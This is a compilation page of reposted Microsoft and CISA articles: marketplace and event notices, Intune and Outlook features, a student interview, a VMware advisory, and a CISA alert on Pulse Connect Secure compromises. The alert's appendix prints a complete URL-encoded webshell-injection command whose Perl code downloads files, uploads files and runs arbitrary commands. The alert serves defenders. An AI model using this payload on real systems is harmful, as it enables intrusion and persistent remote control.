This article is contributed. See the original author and article here.
We continue to expand the Azure Marketplace ecosystem. For this volume, 54 new offers successfully met the onboarding criteria and went live. See details of the new offers below: | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This article is contributed. See the original author and article here.
Microsoft is committed to helping public sector leaders through their intergovernmental agency data sharing, cybersecurity, and collaboration initiatives. Register here for our Microsoft State and Local Government Collaboration and Cybersecurity Summit on April 27th. This free virtual event will deliver key insights, practical guidance, and direct conversations with public sector leaders and Microsoft stakeholders. Join us to learn more about:
Our virtual event provides sessions tailored specifically for state and local organizations, as well as live interactive conversations with industry peers and Microsoft experts to address real world issues. Also gain access to content presented during the Federal and Civilian agency sessions delivered on April 20, 2021.
Learn from others. Share common strategies. Register today at https://aka.ms/MicrosoftinGov.
This article is contributed. See the original author and article here.
This article is contributed. See the original author and article here.
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.
Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.
On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:
We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).
The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:
DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
Licenseserverproto.cgiLicenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
HTTP requestscompcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
ID argumentLogin.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
HTTP requestsOther files were found with additional functionality:
libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:
Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
The threat actor then ran the commands listed in table 1 via the webshell.
Table 1: Commands run via webshell
| Time | Command |
|---|---|
| 2021-01-19T07:46:05.000+0000 | pwd |
| 2021-01-19T07:46:24.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T08:10:13.000+0000 | cat%20/home/webserver/htdocs/dana-na/l[redacted] |
| 2021-01-19T08:14:18.000+0000 | See Appendix. |
| 2021-01-19T08:15:11.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T08:15:49.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T09:03:05.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T09:04:47.000+0000 | $mount |
| 2021-01-19T09:05:13.000+0000 | /bin/mount%20-o%20remount,rw%20/dev/root%20/ |
| 2021-01-19T09:07:10.000+0000 | $mount |
The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.
Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.
CISA strongly urges organizations using Pulse Secure devices to immediately:
If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:
In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:
After preservation, you can remediate your Pulse Connect Secure appliance by:
CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has been taken place.
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.
Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-downloadn%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmpnn%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20text/htmlnn%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20image/gifnn%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX
Initial version: April 20, 2021
This product is provided subject to this Notification and this Privacy & Use policy.
This article is contributed. See the original author and article here.
We’re excited to announce support for a new authentication method for Automated Device Enrollment (ADE) which is Setup Assistant with Modern Authentication. This new authentication method will be available for iOS/iPadOS devices running 13.0 and later and for macOS devices running 10.15 and later, in public preview in Microsoft Endpoint Manager.
This new authentication method for automated device enrollment will allow your organization to require authentication with Azure AD (required) and multi-factor authentication (optional) in order to successfully enroll the device. The end user will be required to authenticate with their Azure AD credentials during Setup Assistant, with an additional Azure AD login to the Company Portal after enrollment. If the admin has a Conditional Access policy that requires multi-factor authentication (at enrollment only, or enrollment and Company Portal login) then MFA will be required, otherwise it is optional. This will benefit organizations that are looking to require authentication in the out-of-box experience (OOBE) during enrollment in the Setup Assistant screens prior to users accessing the home screen.
Enrollment is completed once the user lands on the home screen, and users can freely use the device for resources not protected by Conditional Access. User affinity is established when users complete the additional Azure AD login into the Company Portal app on the device. That additional Azure AD login to the Company Portal app completes Azure AD registration, which establishes user affinity between the device user and Intune. Once user device affinity is established, the device will show up in the given user’s device list in the Azure AD portal since device identity association is established upon a successful login into the Company Portal.
When creating an Automated Device Enrollment profile, you’ll be able to choose a new authentication method: Setup Assistant with modern authentication (preview). This method provides all the security from authenticating with the Company Portal but avoids the issue of leaving end users stuck on a device they can’t use while the Company Portal installs on the device. With this new authentication method, the user has to authenticate using Azure AD credentials during the setup assistant screens. This will require an additional Azure AD login post-enrollment in in the Company Portal app to gain access to corporate resources protected by Conditional Access. The correct Company Portal version will automatically be sent down as a required app to the device for iOS/iPadOS, which we recommend choosing a VPP token for the enrollment profile. Otherwise, it will be sent down if the end user completes setting up their Apple ID during the Setup Assistant screens. For macOS, here are the options to get the Company Portal on the device – Add the Company Portal for macOS app – Microsoft Intune | Microsoft Docs.
If the admin configures a Conditional Access policy to require multi-factor authentication (MFA), then the end user will need a second device to complete MFA. Multi-factor authentication is optional based on the configuration of the MFA Azure AD settings.
A new improvement we’ve made to our onboarding experience helps guide end users to complete that second Azure AD authentication by automatically redirecting to the iOS/iPadOS Company Portal when the user attempts to access corporate data.
If users open any managed iOS/iPadOS applications that are protected by Conditional Access and they haven’t completed the additional Azure AD login into the iOS/iPadOS Company Portal, they will be redirected to the iOS/iPadOS Company Portal from those other apps as part of this new change. This way, users will know exactly where to go to get access to resources protected by Conditional Access and will be guided to complete that last step.
Here is what it will look like if the end user tries to open any app protected by Conditional Access before authenticating in the Company Portal –
Conditional Access block screen
System prompt that opens the iOS/iPadOS Company Portal
Learn how to configure the new Setup Assistant with Modern Authentication for iOS/iPadOS and macOS in the Microsoft Endpoint Manager admin center by reading Enroll iOS/iPadOS devices by using ADE – Microsoft Intune | Microsoft Docs and Enroll macOS devices – Apple Business Manager or Apple School Manager | Microsoft Docs. Within the MEM admin center, you can control where a user is prompted for multi-factor authentication using different cloud apps when creating a Conditional Access policy. The following screenshot provides an example of the prompt locations:
MFA Prompt Locations for Microsoft Intune and Microsoft Intune Enrolment
For both iOS/iPadOS and macOS, user device affinity is established with the additional Azure AD login to the Company Portal app as mentioned above. That is also when device compliance is assessed, and the device shows up as compliant in the Microsoft Endpoint Manager admin center. If you would like to keep the device as enrolled with Intune but without user device affinity, that is also supported.
Once enrollment is completed during Setup Assistant, the end user lands on the home screen and can freely use the device. If there are no resources protected by Conditional Access and if Azure AD registration is not required, then this authentication method can be used to fully enroll the device as a user-less device. Note the following device behavior if you choose this automated device enrollment flow without guiding end users to login to the Company Portal post enrollment:
Let us know if you have any questions by commenting on this post or reaching out to @IntuneSuppTeam on Twitter.
This article is contributed. See the original author and article here.
While back-to-back meetings have become a hallmark of the pandemic era, our recent research proves that even small breaks between meetings can have a positive impact on our stress levels and our ability to focus and engage in meetings.
New settings in Microsoft Outlook make it easy to automatically carve out these essential breaks between back-to-backs – and because we know that one size does not fit all, companies have two options.
The organization-wide setting can be deployed by company administrators using PowerShell.
Administrators can set the meetings in their organization to start late or end early automatically, determining if the break happens at the beginning or end of meetings. From there, a company can also apply different settings to different meeting lengths – 60 minutes and over or under 60 minutes. For example, you can make all meetings under 60 minutes start late with a five minute break and all meetings 60 minutes or over start late with a 10-minute break.
Because we know flexibility is important, once the setting is deployed at the organization level, it is easy for individuals to adjust the setting for their needs – for individual meetings, or all meetings they schedule – by following these instructions.
How does it work?
Once the PowerShell cmdlet has been enabled, the following will happen:
How do I enable this?
For our main Microsoft Exchange Online PowerShell documentation, please go here. You can also follow the instructions below.
Admins can set the default settings for shortened events using Set-OrganizationConfig.
Examples:
Set-OrganizationConfig -ShortenEventScopeDefault 2 (this uses the default length)
Note: Admins can see the current value of the settings using Get-OrganizationConfig cmdlet.
As always, your feedback helps us prioritize our work and understand better how we can help you, so stop by our UserVoice channel and share your ideas.
Thanks!
Gabriel
This article is contributed. See the original author and article here.
One thing is certain: hybrid work is the future of work. People want increased flexibility and a blended work model that grants them the freedom to work when and where it’s most comfortable for them. Hybrid work can deliver a future that people want and a future that I think will be better—but that doesn’t…
The post Research shows your brain needs breaks—Outlook and Microsoft Teams can help appeared first on Microsoft 365 Blog.
Brought to you by Dr. Ware, Microsoft Office 365 Silver Partner, Charleston SC.
This article is contributed. See the original author and article here.
This series highlights Microsoft Learn Student Ambassadors who achieved the Gold milestone and have recently graduated from university. Each blog features a different student and highlights their accomplishments, their experience with the Student Ambassadors community, and what they’re up to now.
Today we’d like to introduce Sabiha Shaik, who is from the United Arab Emirates and graduated last September from the Birla Institute of Technology and Science Pilani, Dubai Campus.
Responses have been edited for clarity and length.
When you became a Student Ambassador in the Fall of 2018, did you have any specific goals you wanted to reach, like attain a skill or work on a particular quality? What were they, and did being a Student Ambassador help you achieve them?
I wanted to form connections with others who are as passionate about technology as I was, learn about upcoming technologies, and have an opportunity to reach as many people as possible and create a greater impact in my local community. Through the program, I was able to achieve all the above and so much more.
I was able to learn more about two specific areas I wanted to develop myself in–digital accessibility and mobile and web development. Attending weekly office hours, asking questions to Cloud Advocates, and participating in topic-specific hackathons all really helped me push my technical knowledge further. With the resources available to improve soft skills and interacting with other Student Ambassadors, I was able to increase the impact in my community by growing attendance at events.
I met many Student Ambassadors and was able to collaborate with a few along with a Microsoft Most Valuable Professional to start the MSInspir YouTube Channel. Since the channel started in Aug 2019, it has gained 41,789 views and a subscriber count of 1.59K. It includes 114 videos to date consisting of workshops, interviews, podcasts, and quick tips on all aspects related to technology.
Overall, the program was exactly what I needed as a student. It offered me a supportive community where I could be myself, thrive, and work towards building something that was much greater than myself. This community has had a tremendous impact on me, especially during university because I felt a bit left out as I couldn’t find others who were as passionate or interested in technology as I was. This community gave me a chance to not only develop technical skills and soft skills but also have connections to cherish even after leaving the program.
You’ve mentioned some of your accomplishments, but what was one of the accomplishments that you’re proudest of?
If I had to pick one, it would be speaking at the Student Zone of Microsoft Build 2020 about Microsoft MakeCode Arcade, where I gave a hands-on tutorial introducing programming concepts while creating a simple sprite-based game. Being able to interact and speak to an audience consisting of a mix of young students and new and experienced programmers who were looking to getting started creating games with block coding was truly an amazing experience. Session evaluations showed that 77% of the attendees learned new skills, and 88% were likely to use the skills discussed. It was amazing to learn that the session had such a huge impact, one that I was aiming to create when I joined the program. The session recording was later uploaded to YouTube where it was able to reach many more youths interested in getting started with programming, games, and block coding.
You graduated several months ago. What have you been up to since then?
I joined as a Junior Developer at the Chalhoub Group, the leading partner for luxury across the Middle East for over 60 years. I’m helping to develop the internal learning experience platform that employees use to learn everything from retail, leadership, digital and enabling artsthrough interactive interactions and experiences using code!
I still plan to continue conducting sessions and give back to the community during my free time.
If you could redo your time in the program, is there anything you would have done differently?
I don’t think there is a lot I would have done differently as my time in the program was filled with so many opportunities that I got to experience. I would probably have been a bit more confident and assured that what I’m doing is on the right track and do the thing, no matter how scary it might seem at first!
If you were to describe the Student Ambassadors community to a student who is considering joining, what would you say to convince them to join?
Imagine waking up every day knowing there is a community of people you can share your ideas with, collaborate with and leave a lasting impact on the world. That’s the Student Ambassadors program. The opportunities in the program are endless – you get to develop your soft skills, event organization skills, and marketing skills on top of technical skills, and you get to expand your network. It’s a program that provides you a perfect blend of everything you might want to experience as a student.
And what advice would you give to new Student Ambassadors?
You’ll get as much out of the program as much work as you put in it. Seek as many experiences as you can in the program. Any given week there are plenty of things that are happening in the Student Ambassador community. Be active in the program.
Set goals and milestones for yourself in the program and think of how you can work on it by thinking of specific things you can do in the Student Ambassador community to achieve them.
Reach out to others in the program to learn from them and experiment with their tips for your local community. It’s not often that you have access to such a huge network of students from all across the world!
Finally, remember that it’s all about giving back and being proud of what you’ve accomplished, even if it’s just making that difference for one person in your community.
Do you have a motto in life, a guiding principle that drives you?
Do one thing every day (or week) that scares you! Growth comes from new challenges, and one way to ensure you keep growing is to keep doing things outside your comfort zone.
Lastly, on a lighter note, can you share one random fun fact about you that not many people know?
I enjoy art and painting in my leisure time, specifically sketching and acrylic painting. I was a part of the graphic design club at university where I designed posters for various events.
Thank you, Sabiha, and good luck to you in all your future endeavors! Learn more about the Student Ambassadors community and start your own journey today.
This article is contributed. See the original author and article here.
VMware has released a security update to address a vulnerability affecting NSX-T. An attacker can exploit this vulnerability to take control of an affected system
CISA encourages users and administrators to review VMSA-2021-0006 and apply the necessary update and workaround.
This article is contributed. See the original author and article here.
The small island of Malta is about to become much bigger: April 24 is set to see scores of speakers and tech enthusiasts meet digitally for the country’s first-ever Data Saturday.
This Saturday’s event is scheduled to host the best speakers and technical sessions about Microsoft Data Platform available for free to the entire world.
The Maltese edition of Data Saturday, the larger event which enables the data community to run small regional events with little outlay or set-up difficulties, is made especially by the tech community for the tech community.
Co-organized by Data Platform MVP and Malta Microsoft Data Platform User Group member Dennes Torres, all speakers and organizers are volunteers, who expect to stay awake until late in the night to prepare an unforgettable learning experience.
Viewers, meanwhile, will play a part in deciding the conference itself: they will vote for the speakers and sessions.
Recent Comments